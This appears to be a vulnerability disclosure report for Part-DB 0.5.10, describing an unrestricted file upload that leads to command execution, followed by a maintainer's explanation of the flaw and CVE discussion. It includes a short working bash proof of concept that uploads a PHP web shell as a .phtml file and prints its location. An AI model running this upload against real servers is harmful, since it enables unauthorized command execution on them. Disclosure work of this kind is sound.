OS Command Injection in part-db/part-db
Reported on
Feb 15th 2022
Description
OS command injection (also known as shell injection) is a web security vulnerability that allows an attacker to execute arbitrary operating system (OS) commands on the server that is running an application, and typically fully compromise the application and all its data. Very often, an attacker can leverage an OS command injection vulnerability to compromise other parts of the hosting infrastructure, exploiting trust relationships to pivot the attack to other systems within the organization.
Proof of Concept
#!/bin/bash
host=127.0.0.1/Part-DB-0.5.10 #WEBHOST
echo "<?php system(id); ?>">POC.phtml #PHP Shell Code
result=`curl -i -s -X POST -F "logo_file=@POC.phtml" "http://$host/show_part_label.php" | grep -o -P '(?<=value="data/media/labels/).*(?=" > <p)'`
rm POC.phtml
echo Shell Location : "$host/data/media/labels/$result"
Impact
If successfully exploited OS Command Injection could allow an attacker or malicious user command execution on the target with the same permissions as the exploited web server. Depending on the configuration of the target, and level of security hardening that has been conducted (or lack there of) successful exploitation of this vulnerability could, potentially result in the attacker gaining complete control of the vulnerable system, exfiltrating sensitive data or performing privilege escalation / lateral movement.
The possibility of the exploit depends somewhat on the server config (interpreting phtml as php file). The main problem is that Part-DB currently only block .php files, and not other potentialy unsafe extensions as well. I will fix that
@admin and @maintainer Please assign CVE ID if applicable.
We are happy to assign a CVE, we just require the approval of the maintainer before we can action for you.
@maintainer - are you happy for us to assign and publish a CVE for this report?